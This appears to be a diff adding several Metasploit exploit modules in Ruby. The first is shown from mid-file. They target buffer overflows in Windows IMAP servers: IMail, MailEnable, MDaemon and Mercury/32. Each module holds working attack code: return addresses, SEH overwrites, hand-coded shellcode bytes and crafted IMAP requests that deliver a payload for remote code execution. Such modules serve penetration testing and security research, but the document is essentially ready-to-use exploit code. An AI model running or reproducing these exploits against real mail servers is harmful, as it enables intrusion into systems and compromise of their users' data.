class Exploits::Windows::Imap::IMailIMAPDeleteOverflow < Msf::Exploit::Remote
include Exploit::Remote::Imap
def initialize(info = {})
super(update_info(info,
'Name' => 'IMail IMAP4D Delete Overflow',
'Description' => %q{
This module exploits a buffer overflow in the 'DELETE'
command of the the IMail IMAP4D service. This vulnerability
can only be exploited with a valid username and password.
This flaw was patched in version 8.14.
},
'Author' => [ 'spoonm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '11838'],
[ 'BID', '11675'],
[ 'MIL', '33'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'GETPCTYPE' => 'edx',
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 614,
'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
# alphanum rets :(, will look more into it later
['Windows XP sp0 comctl32.dll', { 'Ret' => 0x77364650 }],
],
'DisclosureDate' => 'Nov 12 2004',
'DefaultTarget' => 0))
end
def exploit
connect_login
print_status("Sending overflow string...")
req = 'A683 DELETE '
req << payload.encoded
# Jump over code
req << "\x74\x32\x75\x30"
req << [target.ret].pack('V')
req << Rex::Text.rand_text_alphanumeric(44)
# GetEIP code
req << "\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x5a\x6a\x31\x59"
req << "\x6b\x42\x34\x49\x30\x42\x4e\x42\x49\x75\x50\x4a\x4a\x52\x52\x59"
# Alphanumeric jmp back (edx context)
req << "\x6a\x6a\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41"
req << "\x7a\x42\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50"
req << "\x75\x4a\x49\x52\x7a\x71\x4a\x4d\x51\x7a\x4a\x6c\x55\x66\x62\x57"
req << "\x70\x55\x50\x4b\x4f\x6b\x52\x6a"
# Run off the stack, so we don't kill our payload, or something...
req << Rex::Text.rand_text_alphanumeric(600)
# Terminate the request
req << "\r\n"
sock.put(req)
handler
disconnect
end
end
end

66
modules/exploits/windows/imap/mailenable_status.rb Normal file
View File

@ -0,0 +1,66 @@
require 'msf/core'
module Msf
class Exploits::Windows::Imap::MailEnableImapStatusOverflow < Msf::Exploit::Remote
include Exploit::Remote::Imap
include Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'MailEnable Pro (1.54) IMAP STATUS Request Buffer Overflow',
'Description' => %q{
MailEnable's IMAP server contains a buffer overflow
vulnerability in the STATUS command. With proper
credentials, this could allow for the execution of arbitrary
code.
},
'Author' => [ 'MC' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2005-2278'],
[ 'BID', '14243'],
[ 'NSS', '19193'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 450,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
['MailEnable 1.54 Pro Universal', { 'Rets' => [9273, 0x1001c019] }], #MEAISP.DLL
['Windows XP Pro SP0/SP1 English', { 'Rets' => [9273, 0x71aa32ad] }],
['Windows 2000 Pro English ALL', { 'Rets' => [9273, 0x75022ac4] }],
['Windows 2003 Server English', { 'Rets' => [9273, 0x7ffc0638] }],
],
'DisclosureDate' => 'Jul 13 2005',
'DefaultTarget' => 0))
end
def exploit
connect_login
seh = generate_seh_payload(target['Rets'][1])
buf = Rex::Text.rand_text_alphanumeric(target['Rets'][0])
req = "a001 STATUS \".\x00" + buf + seh
req << "\" (UIDNEXT UIDVALIDITY MESSAGES UNSEEN RECENT)\r\n"
sock.put(req)
handler
disconnect
end
end
end

73
modules/exploits/windows/imap/mailenable_w3c_select.rb Normal file
View File

@ -0,0 +1,73 @@
require 'msf/core'
module Msf
class Exploits::Windows::Imap::MailEnableImapW3CLoggingSelectOverflow < Msf::Exploit::Remote
include Exploit::Remote::Imap
include Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the W3C logging
functionality of the MailEnable IMAPD service. Logging is
not enabled by default and this exploit requires a valid
username and password to exploit the flaw. MailEnable
Professional version 1.6 and prior and MailEnable Enterprise
version 1.1 and prior are affected.
},
'Author' => [ 'MC' ],
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '15006'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
['MailEnable 1.54 Pro Universal', { 'Ret' => 0x1001c019 } ] #MEAISP.DLL
],
'DisclosureDate' => '',
'DefaultTarget' => 0))
end
def check
connect
disconnect
if (banner and banner =~ /MailEnable Service, Version: 0-1\.54/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect_login
buf = Rex::Text.rand_text_alphanumeric(6196, payload_badchars)
seh = generate_seh_payload(target.ret)
req = 'a01 SELECT ' + buf + seh + "\r\n"
sock.put(req)
handler
disconnect
end
end
end

77
modules/exploits/windows/imap/mdaemon_cram_md5.rb Normal file
View File

@ -0,0 +1,77 @@
require 'msf/core'
module Msf
class Exploits::Windows::Imap::MDaemonImapCramMD5Overflow < Msf::Exploit::Remote
include Exploit::Remote::Imap
def initialize(info = {})
super(update_info(info,
'Name' => 'Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow',
'Description' => %q{
This module exploits a buffer overflow in the CRAM-MD5
authentication of the MDaemon IMAP service. This
vulnerability was discovered by Muts.
},
'Author' => [ 'anonymous' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '11838'],
[ 'CVE', '2004-1520'],
[ 'BID', '11675'],
[ 'MIL', '90'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'MDaemon IMAP 8.0.3 Windows XP SP2', { } ],
],
'DisclosureDate' => 'Nov 12 2004',
'DefaultTarget' => 0))
end
def exploit
connect
print_status("Asking for CRAM-MD5 authentication...")
sock.put("a001 authenticate cram-md5\r\n")
res = sock.get_once
print_status("Received CRAM-MD5 answer: #{res.chomp}")
# Magic no return-address exploitation ninjaness!
buf = 'AAAA' + payload.encoded + make_nops(258) + "\xe9\x05\xfd\xff\xff"
req = Rex::Text.encode_base64(buf) + "\r\n"
sock.put(req)
res = sock.get_once
print_status("Received authentication reply: #{res.chomp}")
print_status("Sending LOGOUT to close the thread and trigger an exception")
sock.put("a002 LOGOUT\r\n")
res = sock.get_once
print_status("Received LOGOUT reply: #{res.chomp}")
select(nil, nil, nil, 1)
handler
disconnect
end
end
end

71
modules/exploits/windows/imap/mercury_rename.rb Normal file
View File

@ -0,0 +1,71 @@
require 'msf/core'
module Msf
class Exploits::Windows::Imap::MercuryIMAPRenameOverflow < Msf::Exploit::Remote
include Exploit::Remote::Imap
def initialize(info = {})
super(update_info(info,
'Name' => 'Mercury/32 v4.01a IMAP RENAME Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow vulnerability in the
Mercury/32 v.4.01a IMAP service.
},
'Author' => [ 'MC' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-1211'],
[ 'BID', '11775'],
[ 'NSS', '15867'],
[ 'MIL', '98'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x0a\x0d\x20",
'Prepend' => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",
},
'Platform' => 'win',
'Targets' =>
[
['Windows 2000 SP4 English', { 'Ret' => 0x7c2f8498 }],
['Windows 2000 SP4 English', { 'Ret' => 0x7846107b }],
['Windows XP Pro SP0 English', { 'Ret' => 0x77dc0df0 }],
['Windows XP Pro SP1 English', { 'Ret' => 0x77e53877 }],
],
'DisclosureDate' => 'Nov 29 2004'))
end
def check
connect
disconnect
if (banner and banner =~ /Mercury\/32 v4\.01a/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect_login
buf = Pex::Text.rand_text_alpha_upper(260, payload_badchars)
req = "a001 RENAME " + buf + [target.ret].pack('V') + payload.encoded + "\r\n"
sock.put(req)
handler
disconnect
end
end
end